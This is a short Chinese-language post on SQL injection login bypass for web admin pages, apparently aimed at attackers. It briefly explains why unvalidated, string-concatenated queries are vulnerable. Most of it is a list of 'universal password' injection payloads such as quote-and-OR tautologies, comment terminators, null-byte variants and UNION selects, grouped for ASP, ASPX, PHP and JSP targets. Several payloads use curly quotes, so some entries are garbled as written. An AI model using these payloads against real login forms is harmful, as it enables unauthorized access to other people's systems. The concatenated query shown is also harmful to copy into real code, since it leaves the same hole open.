原理
後臺登入頁面沒有進行內容驗證,輸入預設都是合法,所有資料都是被信任,【=】優先於【and】,【and】優先於【or】,優先關係 or<and<not。
簡單的大概為
select * from username='輸入值1' and password= '輸入值2'
SELECT * FROM admin WHERE Username= '".$username."' AND Password= '".md5($password)."'
例:使用萬能賬號'a'or true #
select * from user where username='a' or true
//1′ or 1=1 or ‘1’=’1
SELECT * FROM admin WHERE Username='1' OR 1=1 OR '1'='1' AND Password='EDFKGMZDFSDFDSFRRQWERRFGGG'
即得到優先順序關係:or<and<not,同一優先順序預設從左往右計算。
' or 1='1
'or'='or'
admin
admin'--
admin' or 4=4--
admin' or '1'='1'--
admin888
"or "a"="a
admin' or 2=2#
a' having 1=1#
a' having 1=1--
admin' or '2'='2
')or('a'='a
or 4=4--
c
a'or' 4=4--
"or 4=4--
'or'a'='a
"or"="a'='a
'or''='
'or'='or'
1 or '1'='1'=1
1 or '1'='1' or 4=4
'OR 4=4%00
"or 4=4%00
'xor
admin' UNION Select 1,1,1 FROM admin Where ''='
1
-1%cf' union select 1,1,1 as password,1,1,1 %23
1
17..admin' or 'a'='a 密碼隨便
'or'='or'
'or 4=4/*
something
' OR '1'='1
1'or'1'='1
admin' OR 4=4/*
1'or'1'='1
aspx萬能密碼
1:”or “a”=”a
2: ‘)or(‘a’=’a
3:or 1=1–
4:’or 1=1–
5:a’or’ 1=1–
6:”or 1=1–
7:’or’a’=’a
8:”or”=”a’=’a
9:’or”=’
10:’or’=’or’
11: 1 or ‘1’=’1’=1
12: 1 or ‘1’=’1’ or 1=1
13: ‘OR 1=1%00
14: “or 1=1%00
15: ‘xor
16: 使用者名稱 ’ UNION Select 1,1,1 FROM admin Where ”=’ (替換表名admin)
密碼 1
17..admin’ or ‘a’=’a 密碼隨便
PHP萬能密碼
‘or 1=1/*
User: something
Pass: ’ OR ‘1’=’1
jsp萬能密碼
1’or’1’=’1
admin’ OR 1=1/*